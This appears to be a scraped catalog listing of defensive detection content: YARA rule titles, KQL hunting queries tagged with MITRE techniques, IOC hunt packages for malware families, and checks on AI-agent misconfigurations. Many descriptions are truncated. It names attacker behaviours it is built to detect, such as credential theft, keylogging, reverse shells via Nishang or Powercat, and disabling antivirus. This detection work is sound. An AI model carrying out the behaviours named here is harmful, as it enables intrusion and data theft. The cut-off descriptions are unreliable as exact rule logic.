Looks for big numbers 64:sized
yara low
Looks for big numbers 64:sized
Looks for big numbers 128:sized
yara low
Looks for big numbers 128:sized
Looks for big numbers 256:sized
yara low
Looks for big numbers 256:sized
Look for Blowfish constants
yara low
Look for Blowfish constants
AzureDiagnostics
'Discover all critical ports from a list having rules like 'Any' for sourceIp, which means that they are opened to everyone. Critial ports should not be opened to everyone, and should be filtered.'
Consent to Application discovery
kql medium
T1136
AuditLogs
'This query looks at the last 14 days for "Consent to application" operation by a user/app which could potentially mean unauthorized access. Additional context is added from AuditLogs based on Corrlea
Look for CRC16 table
yara low
Look for CRC16 table
Look for CRC32 [poly]
yara low
Look for CRC32 [poly]
Look for CRC32 table
yara low
Look for CRC32 table
CRC32 table lookup
yara low
CRC32 table lookup
Look for CRC32b [poly]
yara low
Look for CRC32b [poly]
Look for CRC32c (Castagnoli) [poly]
yara low
Look for CRC32c (Castagnoli) [poly]
Looks for crypt32 CryptBinaryToStringA function
T1595T1530
"This Kusto (KQL) hunting query detects blob-enumeration or file-spraying behaviour in Azure Storage by: - Aggregating requests into time-bound sessions with row_window_session(). - Defining a "us
Look for ElfHash
yara low
Look for ElfHash
Look for FlyUtils.CnDES Decrypt ECB function
Look for FlyUtils.CnDES Encrypt ECB function
T1136
'This hunting query identifies a user that add/invite a member to the organization for the first time. This technique can be leveraged by attackers to add stealth account access to the organization.'
T1078.004
AuditLogs
'This query will look for events where guest user was invited but has not accepted/redeemed invite for unusually longer period. Any invites not redeemed for longer period of time can be misused and
T1547.006
DeviceProcessEvents
'Detects observed Visual Studio Code (VS Code) extension installation activity on a user's system within the query time range. Note: This query does not return a complete per-user inventory of instal
T1484
CloudAppEvents
"This query searches for any action type with high frequency that involves adding, modifying, or removing something in cloud app policies. It sees where the properties are modified such that the old v
T1190
AzureDiagnostics
'This hunting query looks in Azure Web Application Firewall data to find possible SpringShell Exploitation Attempt (CVE-2022-22965). The Spring Framework is one of the most widely used lightweight op
List of primes [char]
yara low
List of primes [char]
List of primes [long]
yara low
List of primes [long]
Rare Audit activity initiated by App
kql medium
T1136
AuditLogs
'Compares the current day to last 14 days of audits to identify new audit activities. Useful for tracking malicious activity related to user/group additions/removals by Azure Apps and automated approv
Rare Audit activity initiated by User
kql medium
T1136
AuditLogs
'Compares current day to last 14 days of audits to identify new audit activities. Useful for tracking malicious activity related to user/group additions/removals by specific users.'
Storage File Seen on Endpoint
kql medium
T1570
DeviceFileEvents
'Finds instances where a file uploaded to blob or file storage and it is seen on an endpoint by Microsoft Defender XDR.'
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with Kimwolf
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 112 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with KongTuke
ThreatFox: OtterCookie IOCs
ioc-hunt high
DnsEvents
Hunt package for 3 IOCs associated with OtterCookie
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 44 IOCs associated with Unknown malware
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 3 IOCs associated with Cobalt Strike
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with Nanocore RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with Remcos
ThreatFox: SmartLoader IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
SmartLoader is a multi-stage loader malware that establishes persistence and exfiltrates data by dropping additional payloads and maintaining command-and-control communication
ThreatFox: StrelaStealer IOCs
ioc-hunt high
DnsEvents
StrelaStealer is a credential-stealing malware that exfiltrates
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Vidar is a data exfiltration malware that steals credentials and sensitive information, often using encrypted channels to transmit stolen data to command-and-control servers.
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 37 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 24 malicious URLs tagged as ClearFake
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 24 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 14 malicious URLs tagged as Mozi
T1528
SigninLogs
'This hunting query will try to identify the user account used to perform a file upload to blob storage. This query can be used to match all file upload events, or filtering can be applied on filename
T1098T1078T1496
AuditLogs
'Identifies when a new user is granted access and any subsequent audit related activity. This can help you identify rogue or malicious user behavior.'
T1078
SigninLogs
'Detects when a user has successfully authenticated to another Microsoft Entra ID tenant with an identity in your organization's tenant. Ref: https://docs.microsoft.com/azure/active-directory/fundam
Account Added to Privileged PIM Group
kql medium
T1098T1548
AuditLogs
'Identifies accounts that have been added to a PIM managed privileged group'
Account MFA Modifications
kql medium
T1556.006
AuditLogs
'Identifies modifications to user's MFA settings. An attacker could use access to modify MFA settings to bypass MFA requirements or maintain persistence.
Approved Access Packages Details
kql medium
T1556
AuditLogs
This query shows details about all approved Entra ID Governance Access Packages assignments. The results include the time the request was created and approved along with the justification text provide
BitLocker Key Retrieval
kql medium
T1555
AuditLogsSecurityAlert
'Looks for users retrieving BitLocker keys. Enriches these logs with a summary of alerts associated with the user accessing the keys. Use this query to start looking for anomalous patterns of key retr
Crash dump disabled on host (ASIM Version)
kql medium
T1070
imRegistry
'This detection looks the prevention of crash dumps being created. This can be used to limit reporting by malware, look for suspicious processes setting this registry key.'
Steal IE 7 credential
yara low
Steal IE 7 credential
imProcessCreate
'breakdown of scripts running in the environment'
imProcessCreate
'Entropy calculation used to help identify Hosts where they have a high variety of processes(a high entropy process list on a given Host over time). This helps us identify rare processes on a given Ho
imProcessCreate
'Finds attempts to list users or groups using the built-in Windows 'net' tool '
T1114
imProcessCreate
'This hunting query looks for hosts exporting a mailbox from an on-prem Exchange server, followed by that same host removing the export within a short time window. This pattern has been observed by at
T1011
imProcessCreate
'Invoke-PowerShellTcpOneLine is a PowerShell script to create a simple and small reverse shell. It can be abused by attackers to exfiltrate data. This query looks for command line activity similar to
ldpreload
yara low
YARA rule: ldpreload
APC queue tasks migration
yara low
APC queue tasks migration
This rule checks MySQL database presence
T1011
imProcessCreate
'Looks for Base64-encoded commands associated with the Nishang reverse TCP shell. Ref: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1'
T1098
AuditLogs
'This hunting query identifies updates to the RequiredResourceAccess property of an OAuth application. This property specifies resources that an application requires access to and the set of OAuth per
T1011
imProcessCreate
'Powercat is a PowerShell implementation of netcat. Whilst it can be used as a legitimate administrative tool it can be abused by attackers to exfiltrate data. This query looks for command line activi
imProcessCreate
'Finds PowerShell execution events that could involve a download'
The 'rat_rdp
The 'rat_telnet' YARA rule detects the presence of a Remote Administration
Remote Administration toolkit VNC
yara low
Remote Administration toolkit VNC
Remote Administration toolkit using webcam
T1218.011
imProcessCreate
'This detection uses Normalized Process Events to hunt Signed Binary Proxy Execution: Rundll32 activities'
Sniff Lan network traffic
yara low
Sniff Lan network traffic
T1072
imProcessCreate
'Beyond your internal software management systems, it is possible you may not have visibility into your entire footprint of SolarWinds installations. This is intended to help use process exection inf
Malware can spread east-west file
yara low
Malware can spread east-west file
Malware can spread east-west using share drive
Match Windows Http API call
yara low
Match Windows Http API call
Match Windows Inet API call
yara low
Match Windows Inet API call
Match Windows Inet API library declaration
Match Winsock 2 API library declaration
T1110
imProcessCreate
'Summarizes uses of uncommon & undocumented commandline switches to create persistence User accounts may be created to achieve persistence on a machine. Read more here: https://attack.mitre.org/wiki/T
T1059T1087T1482T1201T1069T1074
imProcessCreate
Attackers can use Adfind which is administrative tool to gather information about Domain controllers, ADFS Servers. They may also rename executables with other benign tools on the system. Below query
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 113 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with KongTuke
ThreatFox: Unknown malware IOCs
ioc-hunt high
CommonSecurityLogDeviceFileEventsDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 43 IOCs associated with Unknown malware
ThreatFox: Cobalt Strike IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Cobalt Strike is a sophisticated malware used for command and control (C2) operations, enabling attackers
ThreatFox: Lumma Stealer IOCs
ioc-hunt high
UrlClickEvents
The Lumma Stealer malware is a data-exfiltration tool that steals sensitive information such as credentials, browser data, and cryptocurrency wallet details. It typically arrives via phishing emails containing malicious URLs or compromised websites that deliver the payload. SOC analysts should monitor for unusual outbound traffic, unexpected process executions, and signs of credential theft or
ThreatFox: MaskGramStealer IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with MaskGramStealer
ThreatFox: StrelaStealer IOCs
ioc-hunt high
DnsEvents
StrelaStealer is a credential-stealing malware that exfiltrates sensitive data such as usernames, passwords, and browser cookies by establishing command-and-control (C2) communication through malicious domains. It
ThreatFox: Vidar IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsUrlClickEvents
Vidar malware is a data exfiltration tool that steals credentials and sensitive information via encrypted channels, often leveraging stolen credentials or phishing to maintain persistence. It typically arrives through malicious email attachments, compromised credentials, or exploit kits, using IP:port and URL IOCs to establish command-and
imProcessCreate
'Shows the rarest processes seen running for the first time. (Performs best over longer time ranges - eg 3+ days rather than 24 hours!) These new processes could be benign new programs installed on ho
URLhaus: 118-107-44-190-8080 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as 118-107-44-190-8080
URLhaus: 118-107-44-213-8080 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as 118-107-44-213-8080
URLhaus: 118-107-44-253-8080 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as 118-107-44-253-8080
URLhaus: 144-91-86-92 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 15 malicious URLs tagged as 144-91-86-92
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 6 malicious URLs tagged as 32-bit
URLhaus: 38-76-199-154-8888 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as 38-76-199-154-8888
URLhaus: ascii Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as ascii
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 7 malicious URLs tagged as ClearFake
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 29 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 11 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 13 malicious URLs tagged as Mozi
Affect private profile
yara low
Affect private profile
Create or check mutex
yara low
Create or check mutex
Affect private profile
yara low
Affect private profile
Affect system registries
yara low
Affect system registries
Affect system token
yara low
Affect system token
T1529
imProcessCreate
'This detection uses Normalized Process Events to detect System Shutdown/Reboot (MITRE Technique: T1529)'
AI Agents - MCP Tool Configured
kql medium
T1059
This query identifies Copilot Studio AI agents that have Model Context Protocol (MCP) tools configured. MCP tools extend agent capabilities but introduce additional security considerations because the
T1078T1562
IdentityInfo
This query identifies AI agents whose owners are either disabled or removed from the organization. Orphaned agents without an active owner pose governance and security risks because no one is account
AI Agents - Unpublished Unmodified (30d)
kql medium
This query identifies AI agents that remain unpublished and have not been modified for at least 30 days. While these agents may not pose an immediate security threat, they can create operational inef
Perform crypto currency mining
yara low
Perform crypto currency mining
Inject certificate in store
yara low
Inject certificate in store
T1105
imProcessCreate
'This detection uses Normalized Process Events to hunt Certutil activities'
CloudAppEvents
This query identifies Copilot Studio AI agents that are published and contain actions configured with Author Authentication (maker`s personal credentials) but have not been used or invoked in the last
T1552T1078
This query identifies Copilot Studio AI agents that contain hard-coded credentials in Topics or Actions. Storing credentials in clear text within agent logic creates a security risk because these sec
T1562
This query identifies Copilot Studio AI agents that use HTTP actions to endpoints where Power Platform connectors are available (e.g., graph.microsoft.com, management.azure.com). Using direct HTTP ca
T1071T1040
This query identifies Copilot Studio AI agents that send HTTP requests to endpoints using non-HTTPS schemes. Communication over unencrypted HTTP exposes sensitive data in transit and increases the ri
T1071T1041
This query identifies Copilot Studio AI agents that send HTTP requests to endpoints using non-standard ports (other than 443). Communication over uncommon ports can indicate suspicious activity, unau
T1078T1552
Identifies Copilot Studio AI agents with Model Context Protocol (MCP) tools configured using maker credentials. This configuration can create security risks because the tool runs with the maker`s pers
T1078T1190
This query identifies Copilot Studio AI agents without authentication mechanisms. Authentication is an agent-level configuration. Such misconfiguration poses significant security risks because when t
This query identifies Copilot Studio AI agents that are shared broadly-either with the entire organization or configured for multi-tenant access. Such configurations significantly increase the risk of
This query identifies Copilot Studio AI agents that are published and use the maker`s personal credentials in their authentication or integration flows. This configuration introduces security risks b
CloudAppEvents
This query identifies Copilot Studio AI agents that are published but have not been used by any user in the organization for the last 30 days. Dormant agents can create unnecessary exposure and may s
T1499T1562
Advers
T1041
IdentityInfo
This query identifies Copilot Studio AI agents configured to send emails to external mailboxes (outside the organization`s domains). Such configurations can lead to sensitive or internal data being e
Copilot Studio AI Agents - Unused Actions
kql medium
This query identifies Copilot Studio AI agents with classic orchestration that include Actions not referenced in any Topic. While unused Actions may not pose an immediate security risk, they can intr
Steal Firefox credential
yara low
Steal Firefox credential
Steal credential
yara low
Steal credential
Steal VNC credential
yara low
Steal VNC credential
T1071
SecurityAlert
' This hunting query looks for process command line activity related to activity observed by Dev-0056.The command lines this query hunts for are used as part of the threat actor's post exploitation ac
T1204T1102T1567
'This hunting query looks for hosts that have attempted to interact with the Discord CDN. This activity is not normally invoked from the command line and could indicate C2, exfiltration, or malware de
Dynamic DNS
yara low
Dynamic DNS
Escalade priviledges
yara low
Escalade priviledges
T1119
imProcessCreate
'The Exchange Powershell Snapin was loaded on a host, this allows for a Exchange server management via PowerShell. Whilst this is a legitimate administrative tool it is abused by attackers to performs
Run a keylogger
yara low
Run a keylogger
Lookup Geolocation
yara low
Lookup Geolocation
Lookup external IP
yara low
Lookup external IP
Communication using dga
yara low
Communication using dga
Communications use DNS
yara low
Communications use DNS
File downloader/dropper
yara low
File downloader/dropper
Communications over FTP
yara low
Communications over FTP
Communications over HTTP
yara low
Communications over HTTP
Communications over IRC network
yara low
Communications over IRC network
Communications over SSL
yara low
Communications over SSL
Communications over RAW socket
yara low
Communications over RAW socket
Take screenshot
yara low
Take screenshot
Record Audio
yara low
Record Audio
ThreatFox: Kimwolf IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 6 IOCs associated with Kimwolf
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 107 IOCs associated with ClearFake
ThreatFox: Unknown malware IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 6 IOCs associated with Unknown malware
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 4 IOCs associated with Unknown Stealer
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 2 IOCs associated with Remcos
ThreatFox: StrelaStealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 66 IOCs associated with StrelaStealer
ThreatFox: Vidar IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents
Hunt package for 6 IOCs associated with Vidar
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 21 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 30 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 18 malicious URLs tagged as elf
URLhaus: exe Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 10 malicious URLs tagged as exe
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 12 malicious URLs tagged as malware_download
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The Mozi malware family is a backdoor that enables remote command execution and data exfiltration, often used for persistent access and espionage. It typically arrives via phishing emails containing malicious URLs or through compromised websites hosting malicious domains. SOC analysts should monitor for unusual outbound traffic to listed domains, signs of lateral movement,
T1552T1078
IdentityInfo
This query identifies A365 AI agents that contain hard-coded credentials in their tools or actions. Storing credentials in clear text within agent logic creates a security risk because these secrets
T1071T1040
IdentityInfo
This query identifies A365 AI agents that send HTTP requests to endpoints using non-HTTPS schemes. Communication over unencrypted HTTP exposes sensitive data in transit and increases the risk of inte
T1071T1041
IdentityInfo
This query identifies A365 AI agents that send HTTP requests to endpoints using non-standard ports (other than 443). Communication over uncommon ports can indicate suspicious activity, unauthorized n
A365 AI Agents - MCP Tool Configured
kql medium
T1059
IdentityInfo
This query identifies A365 AI agents that have Model Context Protocol (MCP) tools configured. MCP tools extend agent capabilities but introduce additional security considerations because they can exec
T1499T1562
IdentityInfo
This query identifies A365 AI agents that have tools configured but they are not mentioned in instructions. This query identifies A365 AI agents that have tools configured but are not mentioned in in
T1078T1562
IdentityInfo
This query identifies A365 AI agents whose owners are either disabled or removed from the organization, and are not blocked. Orphaned agents without an active owner pose governance and security risks
A365 AI Agents - Publicly Shared
kql medium
IdentityInfo
This query identifies A365 AI agents that are shared publicly. Such configurations significantly increase the risk of unauthorized access by unintended users, which could lead to data exposure or misu
T1499T1562
IdentityInfo
This query identifies A365 AI agents that are published but have short or insufficient instructions. Short instructions increase the risk of prompt injection attacks, where malicious input can influe
T1499T1562
IdentityInfo
This query identifies A365 AI agents that are published but lack configured instructions. Missing instructions increase the risk of prompt injection attacks, where malicious input can influence the a
Check if hotfix are applied
yara low
Check if hotfix are applied
T1041T1565
This query identifies Copilot Studio AI agents using generative orchestration to send emails via the Outlook connector where all action input values are populated dynamically by the orchestrator. Th
Create a COM server
yara low
Create a COM server
Create a new process
yara low
Create a new process
Create a windows service
yara low
Create a windows service
Bypass DEP
yara low
Bypass DEP
Disable Task Manager
yara low
Disable Task Manager
Exchange Server Suspicious File Downloads.
kql medium
T1190
'This query looks for messages related to file downloads of suspicious file types on an Exchange Server. This could indicate attempted deployment of webshells. This query uses the Exchange HttpProxy
T1190
W3CIISLog
'This query looks for suspicious request patterns to Exchange servers that fit patterns recently blogged about by PeterJson. This exploitation chain utilises an SSRF vulnerability in Exchange which ev
External User Access Enabled
kql low
T1098T1556
'This alerts when the account setting is changed to allow either external domain access or anonymous access to meetings.'
T1190
W3CIISLog
'Identifies when 30 or more ports are used for a given client IP in 10 minutes occurring on the IIS server. This could be indicative of attempted port scanning or exploit attempt at internet facing we
High count of failed logons by a user
kql medium
T1110
W3CIISLog
'Identifies when 100 or more failed attempts by a given user in 10 minutes occur on the IIS Server. This could be indicative of attempted brute force based on known account information. This could als
Hijack network configuration
yara low
Hijack network configuration
Code injection with CreateRemoteThread in a remote process
Communications dyndns network
yara low
Communications dyndns network
Communications over P2P network
yara low
Communications over P2P network
Communications smtp
yara low
Communications smtp
Communications smtp
yara low
Communications smtp
Communications smtp
yara low
Communications smtp
Listen for incoming communication
yara low
Listen for incoming communication
Communications over TOR network
yara low
Communications over TOR network
Communications over Toredo network
yara low
Communications over Toredo network
Communications over UDP network
yara low
Communications over UDP network
Install itself for autorun at Windows startup
Silk Typhoon Suspicious Exchange Request
kql medium
T1190
W3CIISLog
'This query looks for suspicious request patterns to Exchange servers that fit a pattern observed by Silk Typhoon actors. The same query can be run on HTTPProxy logs from on-premise hosted Exchange se
Silk Typhoon Suspicious File Downloads.
kql medium
T1190
'This query looks for messages related to file downloads of suspicious file types. This query uses the Exchange HttpProxy AOBGeneratorLog, you will need to onboard this log as a custom log under the t
Suspicious link sharing pattern
kql low
T1598
'Alerts in links that have been shared across multiple Zoom chat channels by the same user in a short space if time. Adjust the threshold figure to change the number of channels a message needs to be
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 124 IOCs associated with ClearFake
ThreatFox: Unknown malware IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 12 IOCs associated with Unknown malware
ThreatFox: Unknown Loader IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 25 IOCs associated with Unknown Loader
ThreatFox: Unknown Stealer IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 9 IOCs associated with Unknown Stealer
ThreatFox: Nanocore RAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 10 IOCs associated with Nanocore RAT
ThreatFox: Remcos IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEventsDnsEvents
Hunt package for 2 IOCs associated with Remcos
ThreatFox: ValleyRAT IOCs
ioc-hunt high
CommonSecurityLogDeviceNetworkEvents
Hunt package for 5 IOCs associated with ValleyRAT
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Vidar is a credential-stealing malware that exfiltrates sensitive data via encrypted channels, often targeting financial institutions and using persistence mechanisms to maintain long-term access.
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 44 malicious URLs tagged as 32-bit
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 40 malicious URLs tagged as ClearFake
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 9 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as mirai
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 5 malicious URLs tagged as Mozi
T1078
'The alert shows users that join a Zoom meeting from a time zone other than the one the meeting was created in. You can also whitelist known good time zones in the tz_whitelist value using the tz data
Following Rule is referenced from AlienVault's Yara rule repository.This rule contains additional processes and driver names.
Affect hook table
yara low
Affect hook table
Zoom E2E Encryption Disabled
kql medium
T1040
'This alerts when end to end encryption is disabled for Zoom meetings.'
T1098T1078
SecurityEventWindowsEvent
'Identifies accounts that are added to a privileged group and then quickly removed, which could be a sign of compromise.'
T1098
SecurityEventWindowsEvent
'Identifies whenever a user account has the setting "Password Never Expires" in the user account properties selected. This is indicated in Security event 4738 in the EventData item labeled UserAccount
Anomalous Single Factor Signin
kql low
T1078.004
SigninLogs
'Detects successful signins using single factor authentication where the device, location, and ASN are abnormal. Single factor authentications pose an opportunity to access compromised accounts, inve
T1190
W3CIISLog
'Identifies connection attempts (success or fail) from clients with very short or very long User Agent strings and with less than 100 connection attempts.'
Checks if being debugged
yara low
Checks if being debugged
Checks for the presence of known debug tools
Anti-Sandbox checks for Anubis
yara low
Anti-Sandbox checks for Anubis
Anti-Sandbox checks for CWSandbox
yara low
Anti-Sandbox checks for CWSandbox
Anti-Sandbox checks for Joe Sandbox
yara low
Anti-Sandbox checks for Joe Sandbox
Anti-Sandbox checks for Sandboxie
yara low
Anti-Sandbox checks for Sandboxie
Anti-Sandbox checks for ThreatExpert
yara low
Anti-Sandbox checks for ThreatExpert
AntiVM checks for Bios version
yara low
AntiVM checks for Bios version
AntiVM checks for VirtualBox
yara low
AntiVM checks for VirtualBox
AntiVM checks for VMWare
yara low
AntiVM checks for VMWare
Authentication Attempt from New Country
kql medium
T1078.004
AADNonInteractiveUserSignInLogsSigninLogs
Detects when there is a login attempt from a country that has not seen a successful login in the previous 14 days. Threat actors may attempt to authenticate with credentials from compromised accounts
T1078.004
IdentityInfoSigninLogs
'Detects when a privileged user account successfully authenticates from a location, device or ASN that another admin has not logged in from in the last 7 days. Privileged accounts are a key target f
Check FindWindowA iat
yara low
YARA rule: Check_FindWindowA_iat
Check OutputDebugStringA iat
yara low
YARA rule: Check_OutputDebugStringA_iat
check RaiseException iat
yara low
YARA rule: check_RaiseException_iat
Check unhandledExceptionFiler iat
yara low
YARA rule: Check_unhandledExceptionFiler_iat
Anti-debug process memory working set size check
Disable AntiVirus
yara low
Disable AntiVirus
Disable Firewall
yara low
Disable Firewall
Disable Registry editor
yara low
Disable Registry editor
Disable User Access Control
yara low
Disable User Access Control
T1110
SecurityEventWindowsEvent
'Identifies when failed logon attempts are 20 or higher during a 10 minute period (2 failed logons per minute minimum) from valid account.'
T1110
W3CIISLog
'Identifies when 20 or more failed attempts from a given client IP in 1 minute occur on the IIS server. This could be indicative of an attempted brute force. This could also simply indicate a misconfi
New country signIn with correct password
kql medium
T1078T1110
SigninLogs
'Identifies an interrupted sign-in session from a country the user has not sign-in before in the last 7 days, where the password was correct. Although the session is interrupted by other controls such
T1098T1078
SecurityEventWindowsEvent
'Identifies when a user account was created and then added to the builtin Administrators group in the same day. This should be monitored closely and all additions reviewed.'
Privileged User Logon from new ASN
kql medium
T1078.004
IdentityInfoSigninLogs
'Detects a successful logon by a privileged account from an ASN not logged in from in the last 14 days. Monitor these logons to ensure they are legitimate and identify if there are any similar sign
T1078.004
'Detects when there is a Service Principal login attempt from a country that has not seen a successful login in the previous 14 days. Threat actors may attempt to authenticate with credentials from
T1134
SecurityEvent
'This query identifies whether an Active Directory user object was assigned a service principal name which could indicate that an adversary is preparing for performing Kerberoasting. This query check
Silk Typhoon New UM Service Child Process
kql medium
T1190
SecurityEventWindowsEvent
'This query looks for new processes being spawned by the Exchange UM service where that process has not previously been observed before. Reference: https://www.microsoft.com/security/blog/2021/03/02/
T1190
'This query looks for errors that may indicate that an attacker is attempting to exploit a vulnerability in the service. Reference: https://www.microsoft.com/security/blog/2021/03/02/hafnium-targetin
Solorigate Named Pipe
kql high
T1055
SecurityEventWindowsEvent
'Identifies a match across various data feeds for named pipe IOCs related to the Solorigate incident. For the sysmon events required for this detection, logging for Named Pipe Events needs to be conf
ThreatFox: ClearFake IOCs
ioc-hunt high
DnsEvents
Hunt package for 163 IOCs associated with ClearFake
ThreatFox: KongTuke IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 4 IOCs associated with KongTuke
ThreatFox: Unknown malware IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 2 IOCs associated with Unknown malware
ThreatFox: StrelaStealer IOCs
ioc-hunt high
DnsEvents
Hunt package for 2 IOCs associated with StrelaStealer
ThreatFox: Vidar IOCs
ioc-hunt high
DnsEventsUrlClickEvents
Hunt package for 28 IOCs associated with Vidar
URLhaus: 32-bit Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 36 malicious URLs tagged as 32-bit
URLhaus: 45-156-87-194 Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 11 malicious URLs tagged as 45-156-87-194
URLhaus: ClearFake Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 37 malicious URLs tagged as ClearFake
URLhaus: elf Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 2 malicious URLs tagged as elf
URLhaus: malware_download Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 3 malicious URLs tagged as malware_download
URLhaus: mirai Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
The Mirai malware family is a botnet that compromises IoT devices to launch large-scale DDoS
URLhaus: Mozi Malicious URLs
ioc-hunt high
CommonSecurityLogDnsEvents
Hunt package for 8 malicious URLs tagged as Mozi
T1098T1078
SecurityEventWindowsEvent
'Identifies when a user account has been added to a privileged built in domain local group or global group such as the Enterprise Admins, Cert Publishers or DnsAdmins. Be sure to verify this is an exp
T1098T1078
SecurityEventWindowsEvent
'Identifies when a user account is created and then deleted within 10 minutes. This can be an indication of compromise and an adversary attempting to hide in the noise.'
T1098T1078
SecurityEventWindowsEvent
'Identifies when a user account is enabled and then disabled within 10 minutes. This can be an indication of compromise and an adversary attempting to hide in the noise.'
T1190T1203
'This query uses the Azure Defender Security Nested Recommendations data to find machines vulnerable to OMIGOD CVE-2021-38647. OMI is the Linux equivalent of Windows WMI and helps users manage configu
T1552
SecurityEvent
'This detection uses Security events from the "AD FS Auditing" provider to detect suspicious object identifiers (OIDs) as part EventID 501 and specifically part of the Enhanced Key Usage attributes. T
AdminSDHolder Modifications
kql high
T1078
SecurityEvent
'This query detects modification in the AdminSDHolder in the Active Directory which could indicate an attempt for persistence. AdminSDHolder Modification is a persistence technique in which an attac
Check Debugger
yara low
YARA rule: Check_Debugger
Check Dlls
yara low
YARA rule: Check_Dlls
Check DriveSize
yara low
YARA rule: Check_DriveSize
Check FilePaths
yara low
The 'Check_FilePaths
Check Qemu Description
yara low
YARA rule: Check_Qemu_Description
Check Qemu DeviceMap
yara low
YARA rule: Check_Qemu_DeviceMap
Check UserNames
yara low
YARA rule: Check_UserNames
Check VBox Description
yara low
YARA rule: Check_VBox_Description
Check VBox DeviceMap
yara low
